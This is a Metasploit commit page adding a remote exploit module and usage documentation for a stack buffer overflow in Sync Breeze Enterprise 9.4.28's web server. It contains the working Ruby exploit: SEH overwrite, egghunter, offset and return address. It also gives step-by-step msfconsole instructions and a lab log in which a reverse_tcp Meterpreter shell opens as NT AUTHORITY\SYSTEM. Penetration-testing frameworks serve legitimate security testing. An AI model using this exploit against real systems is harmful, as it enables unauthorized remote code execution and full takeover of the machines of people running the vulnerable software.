Land #8401, Buffer Overflow on Sync Breeze Enterprise 9.4.28
This commit is contained in:
commit
c0bf2cc6e7
|
@ -0,0 +1,74 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Sync Breeze Enterprise](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe).
|
||||
|
||||
## Verification Steps
|
||||
1. Install a vulnerable Sync Breeze Enterprise
|
||||
2. Start `Sync Breeze Enterprise` service
|
||||
3. Start `Sync Breeze Enterprise` client application
|
||||
4. Navigate to `Tools` > `Sync Breeze Options` > `Server`
|
||||
5. Check `Enable Web Server On Port 80` to start the web interface
|
||||
6. Start `msfconsole`
|
||||
7. Do `use exploit/windows/http/syncbreeze_bof`
|
||||
8. Do `set RHOST ip`
|
||||
9. Do `check`
|
||||
10. Verify the target is vulnerable
|
||||
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
|
||||
12. Do `set LHOST ip`
|
||||
13. Do `exploit`
|
||||
14. Verify the Meterpreter session is opened
|
||||
|
||||
## Scenarios
|
||||
|
||||
###Sync Breeze Enterprise v9.4.28 on Windows 7 SP1
|
||||
|
||||
```
|
||||
|
||||
msf exploit(syncbreeze_bof) > show options
|
||||
|
||||
Module options (exploit/windows/http/syncbreeze_bof):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOST 192.168.2.10 yes The target address
|
||||
RPORT 80 yes The target port
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (windows/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST 192.168.2.187 yes The listen address
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Sync Breeze Enterprise v9.4.28
|
||||
|
||||
|
||||
msf exploit(syncbreeze_bof) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.2.187:4444
|
||||
[*] Sending request...
|
||||
[*] Sending stage (957427 bytes) to 172.16.0.18
|
||||
[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.18:49162) at 2017-05-16 11:00:25 +0100
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : PC-01
|
||||
OS : Windows 7 (Build 7600).
|
||||
Architecture : x86
|
||||
System Language : pt_PT
|
||||
Domain : LAB
|
||||
Logged On Users : 3
|
||||
Meterpreter : x86/windows
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,102 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::Seh
|
||||
include Msf::Exploit::Remote::Egghunter
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sync Breeze Enterprise GET Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow vulnerability
|
||||
in the web interface of Sync Breeze Enterprise v9.4.28, caused by
|
||||
improper bounds checking of the request path in HTTP GET requests
|
||||
sent to the built-in web server. This module has been tested
|
||||
successfully on Windows 7 SP1 x86.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Daniel Teixeira'
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x09\x0a\x0d\x20\x26",
|
||||
'Space' => 500
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Sync Breeze Enterprise v9.4.28',
|
||||
{
|
||||
'Offset' => 2488,
|
||||
'Ret' => 0x10015fde # POP # POP # RET [libspp.dll]
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Mar 15 2017',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => '/'
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
version = res.body[/Sync Breeze Enterprise v[^<]*/]
|
||||
if version
|
||||
vprint_status("Version detected: #{version}")
|
||||
if version =~ /9\.4\.28/
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
else
|
||||
vprint_error('Unable to determine due to a HTTP connection timeout')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
eggoptions = {
|
||||
checksum: true,
|
||||
eggtag: rand_text_alpha(4, payload_badchars)
|
||||
}
|
||||
|
||||
hunter, egg = generate_egghunter(
|
||||
payload.encoded,
|
||||
payload_badchars,
|
||||
eggoptions
|
||||
)
|
||||
|
||||
sploit = rand_text_alpha(target['Offset'])
|
||||
sploit << generate_seh_record(target.ret)
|
||||
sploit << hunter
|
||||
sploit << make_nops(10)
|
||||
sploit << egg
|
||||
sploit << rand_text_alpha(5500)
|
||||
|
||||
print_status('Sending request...')
|
||||
|
||||
send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => sploit
|
||||
)
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue